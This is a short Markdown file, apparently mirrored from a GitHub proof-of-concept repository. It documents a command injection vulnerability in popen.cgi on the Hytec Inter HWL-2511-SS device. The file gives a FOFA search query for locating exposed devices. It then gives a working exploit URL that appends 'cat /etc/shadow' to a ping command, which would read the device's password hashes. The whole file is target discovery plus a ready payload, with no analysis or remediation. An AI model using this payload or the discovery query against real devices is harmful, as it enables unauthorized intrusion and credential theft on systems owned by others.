mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 10:25:55 +00:00
13 lines
222 B
Markdown
13 lines
222 B
Markdown
|
|
## Hytec Inter HWL-2511-SS popen.cgi命令注入漏洞
|
||
|
|
|
||
|
|
## fofa
|
||
|
|
```
|
||
|
|
title="index" && header="lighttpd/1.4.30"
|
||
|
|
```
|
||
|
|
|
||
|
|
### poc
|
||
|
|
```
|
||
|
|
|
||
|
|
/cgi-bin/popen.cgi?command=ping%20-c%204%201.1.1.1;cat%20/etc/shadow&v=0.1303033443137921
|
||
|
|
```
|